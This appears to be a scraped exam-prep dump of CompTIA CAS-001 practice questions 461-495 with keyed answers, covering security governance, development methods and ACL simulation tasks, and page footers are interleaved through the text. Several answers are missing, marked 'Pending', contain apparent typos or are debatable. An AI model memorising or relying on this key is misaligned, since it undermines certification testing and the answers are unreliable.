QUESTION 461The sales team is considering the deployment of a new CRM solution within the enterprise. The IT and Security teams are members of the project; however, neitherteam has expertise or experience with the proposed system. Which of the following activities should be performed FIRST?

A. Visit a company who already has the technology, sign an NDA, and read their latest risk assessment.B. Contact the top vendor, assign IT and Security to work together to implement a demo and pen test the system.C. Work with Finance to do a second ROI calculation before continuing further with the project.D. Research the market, select the top vendors and solicit RFPs from those vendors.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

Real 243CompTIA CAS-001 Exam

QUESTION 462A security administrator notices a recent increase in workstations becoming compromised by malware. Often, the malware is delivered via drive-by downloads, frommalware hosting websites, and is not being detected by the corporate antivirus. Which of the following solutions would provide the BEST protection for thecompany?

Page 243: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Increase the frequency of antivirus downloads and install updates to all workstations.B. Deploy a cloud-based content filter and enable the appropriate category to prevent further infections.C. Deploy a NIPS to inspect and block all web traffic which may contain malware and exploits.D. Deploy a web based gateway antivirus server to intercept viruses before they enter the network.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 463The helpdesk manager wants to find a solution that will enable the helpdesk staff to better serve company employees who call with computer-related problems. Thehelpdesk staff is currently unable to perform effective troubleshooting and relies on callers to describe their technology problems. Given that the helpdesk staff islocated within the company headquarters and 90% of the callers are telecommuters, which of the following tools should the helpdesk manager use to make the staffmore effective at troubleshooting while at the same time reducing company costs? (Select TWO).

A. Web camerasB. EmailC. Instant messagingD. BYODE. Desktop sharingF. Presence

Correct Answer: CESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 464A security manager has started a new job and has identified that a key application for a new client does not have an accreditation status and is currently not meetingthe compliance requirement for

Real 244CompTIA CAS-001 Examthe contract's SOW. The security manager has competing priorities and wants to resolve this issue quickly with a system determination and risk assessment. Which

Page 244: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

of the following approaches presents the MOST risk to the security assessment?

A. The security manager reviews the system description for the previous accreditation, but does not review application change records.B. The security manager decides to use the previous SRTM without reviewing the system description.C. The security manager hires an administrator from the previous contract to complete the assessment.D. The security manager does not interview the vendor to determine if the system description is accurate.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 465A security administrator was recently hired in a start-up company to represent the interest of security and to assist the network team in improving security in thecompany. The sales team is continuously contacting the security administrator to answer security questions posed by potential customers/clients. Which of thefollowing is the BEST strategy to minimize the frequency of these requests?

A. Request the major stakeholder hire a security liaison to assist the sales team with security- related questions.B. Train the sales team about basic security, and make them aware of the security policies and procedures of the company.C. The job description of the security administrator is to assist the sales team; thus the process should not be changed.D. Compile a list of the questions, develop an FAQ on the website, and train the sales team about basic security concepts.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 466The Chief Information Officer (CIO) is focused on improving IT governance within the organization to reduce system downtime. The CIO has mandated that thefollowing improvements be implemented:

Real 245CompTIA CAS-001 Exam-All business units must now identify IT risks and include them in their business risk profiles.

-Key controls must be identified and monitored.

Page 245: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

-Incidents and events must be recorded and reported with management oversight.

-Exemptions to the information security policy must be formally recorded, approved, and managed.

-IT strategy will be reviewed to ensure it is aligned with the businesses strategy and objectives.

In addition to the above, which of the following would BEST help the CIO meet the requirements?

A. Establish a register of core systems and identify technical service ownersB. Establish a formal change management processC. Develop a security requirement traceability matrixD. Document legacy systems to be decommissioned and the disposal process

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 467An organization has decided to reduce labor costs by outsourcing back office processing of credit applications to a provider located in another country. Datasovereignty and privacy concerns raised by the security team resulted in the third-party provider only accessing and processing the data via remote desktopsessions. To facilitate communications and improve productivity, staff at the third party has been provided with corporate email accounts that are only accessible viathe remote desktop sessions. Email forwarding is blocked and staff at the third party can only communicate with staff within the organization. Which of the followingadditional controls should be implemented to prevent data loss? (Select THREE).

A. Implement hashing of data in transitB. Session recording and captureC. Disable cross session cut and pasteD. Monitor approved credit accountsE. User access audit reviewsF. Source IP whitelisting

Correct Answer: CEFSection: (none)Explanation

Page 246: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:Explanation:

Real 246CompTIA CAS-001 Exam

QUESTION 468A company has received the contract to begin developing a new suite of software tools to replace an aging collaboration solution. The original collaboration solutionhas been in place for nine years, contains over a million lines of code, and took over two years to develop originally. The SDLC has broken the primary deliverystages into eight different deliverables, with each section requiring an in-depth risk analysis before moving on to the next phase. Which of the following softwaredevelopment methods is MOST applicable?

A. Spiral modelB. Incremental modelC. Waterfall modelD. Agile model

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 469The manager of the firewall team is getting complaints from various IT teams that firewall changes are causing issues. Which of the following should the managerrecommend to BEST address these issues?

A. Set up a weekly review for relevant teams to discuss upcoming changes likely to have a broad impact.B. Update the change request form so that requesting teams can provide additional details about the requested changes.C. Require every new firewall rule go through a secondary firewall administrator for review before pushing the firewall policy.D. Require the firewall team to verify the change with the requesting team before pushing the updated firewall policy.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

Page 247: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 470An intruder was recently discovered inside the data center, a highly sensitive area. To gain access, the intruder circumvented numerous layers of physical andelectronic security measures. Company leadership has asked for a thorough review of physical security controls to prevent this from happening again. Which of thefollowing departments are the MOST heavily invested in

Real 247CompTIA CAS-001 Examrectifying the problem? (Select THREE).

A. Facilities managementB. Human resourcesC. Research and developmentD. ProgrammingE. Data center operationsF. MarketingG. Information technology

Correct Answer: AEGSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 471The helpdesk department desires to roll out a remote support application for internal use on all company computers. This tool should allow remote desktop sharing,system log gathering, chat, hardware logging, inventory management, and remote registry access. The risk management team has been asked to review vendorresponses to the RFQ. Which of the following questions is the MOST important?

A. What are the protections against MITM?B. What accountability is built into the remote support application?C. What encryption standards are used in tracking database?D. What snapshot or "undo" features are present in the application?E. What encryption standards are used in remote desktop and file transfer functionality?

Correct Answer: BSection: (none)Explanation

Page 248: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:Explanation:

QUESTION 472A software development manager is taking over an existing software development project. The team currently suffers from poor communication, and this gap isresulting in an above average number of security-related bugs making it into production. Which of the following development methodologies involves daily stand-ups designed to improve communication?

A. SpiralB. AgileC. Waterfall

Real 248CompTIA CAS-001 Exam

D. Rapid

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 473A software development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delaybetween requirements documentation and feature delivery. This gap is resulting in an above average number of security- related bugs making it into production.Which of the following development methodologies is the team MOST likely using now?

A. AgileB. WaterfallC. ScrumD. Spiral

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 474

Page 249: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A security manager has received the following email from the Chief Financial Officer (CFO):

"While I am concerned about the security of the proprietary financial data in our ERP application, we have had a lot of turnover in the accounting group and I amhaving a difficult time meeting our monthly performance targets. As things currently stand, we do not allow employees to work from home but this is something I amwilling to allow so we can get back on track. What should we do first to securely enable this capability for my group?"

Based on the information provided, which of the following would be the MOST appropriate response to the CFO?

A. Remote access to the ERP tool introduces additional security vulnerabilities and should not be allowed.B. Allow VNC access to corporate desktops from personal computers for the users working from home.C. Allow terminal services access from personal computers after the CFO provides a list of the users working from home.D. Work with the executive management team to revise policies before allowing any remote Real 249

CompTIA CAS-001 Examaccess.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 475Drag and Drop the following information types on to the appropriate CIA category

Select and Place:

Page 250: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer:

Page 251: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Section: (none)Explanation

Explanation/Reference:

Page 252: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 476An administrator wants to install a patch to an application. Given the scenario, download, verifyand install the patch in the most secure manner. Instructions The last install that is completed willbe the final submission

Page 253: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 254: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: You need to check the hash value of download software with md5 utility.Section: (none)Explanation

Explanation/Reference:Check the below images for more details:

Page 255: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 256: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 477

Page 257: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: 192.18.1.0/24 any 192.168.20.0/24 3389 anySection: (none)Explanation

Explanation/Reference:

Page 258: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 478The IDS has detected abnormal behavior on this network Click on the network devices to viewdevice information Based on this information, the following tasks need to be completed:1. Select the server that is a victim of a SQL injection attack.2 Select the source of the buffer overflow attack.3. Modify the access control list (ACL) on the router(s) to ONLY block the buffer overflow attack.Instructions: Simulations can be reset at any time to the initial state: however, all selections will bedeleted.

Page 259: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 260: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 261: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 262: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: Follow the Steps asSection: (none)Explanation

Explanation/Reference:First, we need to determine the source of the attack and the victim. View the IDS logs to determinethis information. Although SIMs may vary, one example clearly shows the source of the attack asthe 10.2.0.50 host, and the victim is serverD.To block only this traffic we need to modify the following rule on router 2 only:Source address = 10.2.0.50Destination address = 192.168.1.0/24Deny box should be checked.

QUESTION 479Company A has experienced external attacks on their network and wants to minimize the attacksfrom reoccurring. Modify the network diagram to prevent SQL injections. XSS attacks, smurfattacks, e-mail spam, downloaded malware. viruses and ping attacks. The company can spend aMAXIMUM of 550.000 USD. A cost list for each item is listed below1. Anti-Virus Server- $10,0002 Firewall-$15,0003 Load Balanced Server - $10,0004 NIDS/NIPS-$10,0005. Packet Analyzer-55.0006 Patch Server-$15,0007 Proxy Server-$20,000 8. Router - S10.0009 Spam Filter - S5 00010 Traffic Shaper - $20,00011. Web Application Firewall - $10,000Instructions: Not all placeholders in the diagram need to be filled and items can only be used once.

Page 263: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 264: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 265: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: Section: (none)Explanation

Explanation/Reference:

Page 266: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 480The IDS has detected abnormal behavior on this network. Click on the network devices to viewdevice information. Based on this information, the following tasks should be completed:

Page 267: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

1. Select the server that is a victim of a cross-site scripting (XSS) attack.2 Select the source of the brute force password attack.3. Modify the access control list (ACL) on the router(s) to ONLY block the XSS attack.Instructions: Simulations can be reset at anytime to the initial state: however, all selections will bedeleted

Page 268: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 269: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 270: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 271: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: Please review following steps:Section: (none)Explanation

Explanation/Reference:Check the below images for more details:

Page 272: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 273: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 274: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 275: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 276: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 277: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 278: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 279: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 280: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 281: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 282: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 481Company A has noticed abnormal behavior targeting their SQL server on the network from arogue IP address. The company uses the following internal IP address ranges: 192.10.1.0/24 for

Page 283: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

the corporate site and 192.10.2.0/24 for the remote site. The Telco router interface uses the192.10.5.0/30 IP range.Instructions: Click on the simulation button to refer to the Network Diagram for Company A. Clickon Router 1, Router 2, and the Firewall to evaluate and configure each device.Task 1: Display and examine the logs and status of Router 1, Router 2, and Firewall interfaces.Task 2: Reconfigure the appropriate devices to prevent the attacks from continuing to target theSQL server and other servers on the corporate network.

Page 284: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 285: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 286: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 287: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 288: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 289: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: Change the permit statement on the third and 4th line line of the access list (192.168.3.0/24) so that it is denied to 192.168.1.0/24 and192.168.2.0/24.Section: (none)

Page 290: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation

Explanation/Reference:

QUESTION 482You are a new security administrator at Company A. You have the following network diagram andconsole window access to a single device on the network.Gather the information required to fill in hostname, purpose and IP address(es) for each device onthe diagram.Instructions:• Type "help" at any command prompt for a list of available commands.• Each purpose will be used at LEAST once• Some purposes may be used multiple times.• Host names may only be used once.

Page 291: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 292: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Page 293: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: PendingSection: (none)Explanation

Explanation/Reference:

Page 294: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 483Which of the following attacks does Unicast Reverse Path Forwarding prevent?

A. Man in the MiddleB. ARP poisoningC. Broadcast stormD. IP Spoofing

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 484Which of the following authentication types is used primarily to authenticate users through the use of tickets?

A. LDAPB. RADIUSC. TACACS+D. Kerberos

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 485A security consultant is evaluating forms which will be used on a company website. Which of the following techniques or terms is MOST effective at preventingmalicious individuals from successfully exploiting programming flaws in the website?

A. Anti-spam softwareB. Application sandboxingC. Data loss prevention

Page 295: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. Input validation

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

Real 2CompTIA CAS-001 Exam

QUESTION 486A security audit has uncovered that some of the encryption keys used to secure the company B2B financial transactions with its partners may be too weak. Thesecurity administrator needs to implement a process to ensure that financial transactions will not be compromised if a weak encryption key is found. Which of thefollowing should the security administrator implement?

A. Entropy should be enabled on all SSLv2 transactions.B. AES256-CBC should be implemented for all encrypted data.C. PFS should be implemented on all VPN tunnels.D. PFS should be implemented on all SSH connections.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 487A company provides on-demand virtual computing for a sensitive project. The company implements a fully virtualized datacenter and terminal server access withtwo-factor authentication for access to sensitive data. The security administrator at the company has uncovered a breach in data confidentiality. Sensitive data wasfound on a hidden directory within the hypervisor. Which of the following has MOST likely occurred?

A. A stolen two factor token and a memory mapping RAM exploit were used to move data from one virtual guest to an unauthorized similar token.B. An employee with administrative access to the virtual guests was able to dump the guest memory onto their mapped disk.C. A host server was left un-patched and an attacker was able to use a VMEscape attack to gain unauthorized access.D. A virtual guest was left un-patched and an attacker was able to use a privilege escalation attack to gain unauthorized access.

Page 296: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 488Company XYZ provides residential television cable service across a large region.

Real 3CompTIA CAS-001 ExamThe company's board of directors is in the process of approving a deal with the following three companies:

- A National landline telephone provider- A Regional wireless telephone provider- An international Internet service provider

The board of directors at Company XYZ wants to keep the companies and billing separated.

While the Chief Information Officer (CIO) at Company XYZ is concerned about the confidentiality of Company XYZ's customer data and wants to share only minimalinformation about its customers for the purpose of accounting, billing, and customer authentication.

The proposed solution must use open standards and must make it simple and seamless for Company XYZ's customers to receive all four services.

Which of the following solutions is BEST suited for this scenario?

A. All four companies must implement a TACACS+ web based single sign-on solution with associated captive portal technology.B. Company XYZ must implement VPN and strict access control to allow the other three companies to access the internal LDAP.C. Company XYZ needs to install the SP, while the partner companies need to install the WAYF portion of a Federated identity solution.D. Company XYZ needs to install the IdP, while the partner companies need to install the SP portion of a Federated identity solution.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 489The security administrator at a bank is receiving numerous reports that customers are unable to login to the bank website. Upon further investigation, the security

Page 297: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

administrator discovers that the name associated with the bank website points to an unauthorized IP address.

Which of the following solutions will MOST likely mitigate this type of attack?

A. Security awareness and user trainingB. Recursive DNS from the root serversC. Configuring and deploying TSIGD. Firewalls and IDS technologies

Real 4CompTIA CAS-001 Exam

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 490A security administrator has finished building a Linux server which will host multiple virtual machines through hypervisor technology. Management of the Linuxserver, including monitoring server performance, is achieved through a third party web enabled application installed on the Linux server. The security administratoris concerned about vulnerabilities in the web application that may allow an attacker to retrieve data from the virtual machines.

Which of the following will BEST protect the data on the virtual machines from an attack?

A. The security administrator must install the third party web enabled application in a chroot environment.B. The security administrator must install a software firewall on both the Linux server and the virtual machines.C. The security administrator must install anti-virus software on both the Linux server and the virtual machines.D. The security administrator must install the data exfiltration detection software on the perimeter firewall.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 491A breach at a government agency resulted in the public release of top secret information. The Chief Information Security Officer has tasked a group of securityprofessionals to deploy a system which will protect against such breaches in the future.

Page 298: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Which of the following can the government agency deploy to meet future security needs?

A. A DAC which enforces no read-up, a DAC which enforces no write-down, and a MAC which uses an access matrix.B. A MAC which enforces no write-up, a MAC which enforces no read-down, and a DAC which uses an ACL.C. A MAC which enforces no read-up, a MAC which enforces no write-down, and a DAC which uses an access matrix.D. A DAC which enforces no write-up, a DAC which enforces no read-down, and a MAC which Real 5

CompTIA CAS-001 Examuses an ACL.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 492The internal auditor at Company ABC has completed the annual audit of the company's financial system. The audit report indicates that the accounts receivabledepartment has not followed proper record disposal procedures during a COOP/BCP tabletop exercise involving manual processing of financial transactions.

Which of the following should be the Information Security Officer's (ISO's) recommendation? (Select TWO).

A. Wait for the external audit resultsB. Perform another COOP exerciseC. Implement mandatory trainingD. Destroy the financial transactionsE. Review company procedures

Correct Answer: CESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 493Company ABC has recently completed the connection of its network to a national high speed private research network. Local businesses in the area are seekingsponsorship from Company ABC to connect to the high speed research network by directly connecting through Company ABC's network. Company ABC's Chief

Page 299: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Information Officer (CIO) believes that this is an opportunity to increase revenues and visibility for the company, as well as promote research and development inthe area.

Which of the following must Company ABC require of its sponsored partners in order to document the technical security requirements of the connection?

A. SLAB. ISAC. NDAD. BPA

Real 6CompTIA CAS-001 Exam

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 494A security analyst at Company A has been trying to convince the Information Security Officer (ISO) to allocate budget towards the purchase of a new intrusionprevention system (IPS) capable of analyzing encrypted web transactions.

Which of the following should the analyst provide to the ISO to support the request? (Select TWO).

A. Emerging threat reportsB. Company attack tendsC. Request for Quote (RFQ)D. Best practicesE. New technologies report

Correct Answer: ABSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 495

Page 300: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

The IT department of a pharmaceutical research company is considering whether the company should allow or block access to social media websites during lunchtime. The company is considering the possibility of allowing access only through the company's guest wireless network, which is logically separated from the internalresearch network. The company prohibits the use of personal devices; therefore, such access will take place from company owned laptops.

Which of the following is the HIGHEST risk to the organization?

A. Employee's professional reputationB. Intellectual property confidentiality lossC. Downloaded viruses on the company laptopsD. Workstation compromise affecting availability

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

Real 7CompTIA CAS-001 Exam

http://www.gratisexam.com/